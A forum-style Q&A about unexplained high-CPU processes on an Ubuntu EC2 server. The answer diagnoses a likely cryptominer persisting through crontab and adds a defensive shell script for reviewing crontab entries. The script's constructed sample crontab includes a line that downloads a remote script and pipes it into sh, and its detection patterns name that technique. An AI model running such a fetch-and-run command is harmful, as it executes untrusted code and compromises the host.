Unknown processes with high CPU utilization Ubuntu on EC2
I have an Ubuntu instance on EC2 (t3.medium, Ubuntu Server 18.04 LTS) that has been consuming lots of CPU. Their names are not Googleable (just random characters) and do not give any clue as to what they are. How can I investigate this? Attached is a screenshot:
I tried killing the processes, but after a few minutes they reoccur. Same after a restart.
1 Answer
Congratulations! You, good sir, are now the owner of a malware-infected server.
It's probably some crypto-currency miner.
Generally they tend to make an entry in your crontab.
To check crontab for the ubuntu user, run
    sudo crontab -e -u ubuntu

Remove any unknown entries, but take note of where they pointed to.
After you've updated your crontab, kill all of the processes, and check crontab again. Then remove the files referenced by crontab using rm.
Reboot, and verify that it does not reappear. Find whatever vulnerability was used to enter, and make sure everything is up to date and secure again, otherwise you'll be reinfected in short order.
I would suggest not doing the above, but rather nuking the instance and starting a new one.
6
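The crontab review step from the answer, as an added example that is not part of the original post: it lists what each crontab entry runs, flags entries worth a closer look, and records the files they point to before anything is removed. The function names, the flagging patterns and the sample crontab are assumptions made for illustration; the sample is constructed.

```shell
#!/usr/bin/env bash
# Added example (not from the answer): review a user crontab before editing it.

# Constructed sample crontab; the paths, file names and address are made up.
SAMPLE_CRONTAB='# m h dom mon dow command
MAILTO=""
17 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * /var/tmp/.x9f2/kqwzpd >/dev/null 2>&1
@reboot curl -fsSL http://203.0.113.10/i.sh | sh'

# Print only the command part of each active crontab line (user crontab format).
cron_commands() {
  awk '
    /^[ \t]*(#|$)/ { next }                          # comment or blank line
    /^[ \t]*[A-Za-z_][A-Za-z0-9_]*[ \t]*=/ { next }  # VAR=value setting
    {
      n = ($1 ~ /^@/) ? 1 : 5      # @reboot etc. replace the five time fields
      if (NF <= n) next
      line = $0
      sub(/^[ \t]+/, "", line)
      for (i = 0; i < n; i++) sub(/^[^ \t]+[ \t]+/, "", line)
      print line
    }'
}

# Keep commands that run from world-writable directories, touch hidden paths,
# or pipe a download into a shell. Heuristic: an unflagged entry is not proven clean.
flag_suspicious() {
  grep -E '(/tmp|/var/tmp|/dev/shm)/|/\.[^/[:space:]]|(curl|wget)[^|]*\|[[:space:]]*(ba)?sh' || true
}

# List the absolute file paths a command refers to, so they can be noted
# (and hashed or copied) before the entry and the files are removed.
cron_paths() {
  grep -oE '(^|[[:space:]>])/[^[:space:];|&<>]+' | sed -E 's/^[[:space:]>]+//' |
    grep -vx '/dev/null' | sort -u
}

# Demo on the constructed sample. On a host, feed the real crontab instead:
#   sudo crontab -l -u ubuntu | cron_commands | flag_suspicious
echo "Flagged entries:"
printf '%s\n' "$SAMPLE_CRONTAB" | cron_commands | flag_suspicious
echo "Files to record before removal:"
printf '%s\n' "$SAMPLE_CRONTAB" | cron_commands | flag_suspicious | cron_paths
```

Reading the crontab with `-l` instead of `-e` leaves it untouched, so the entries can be saved as evidence before they are edited out.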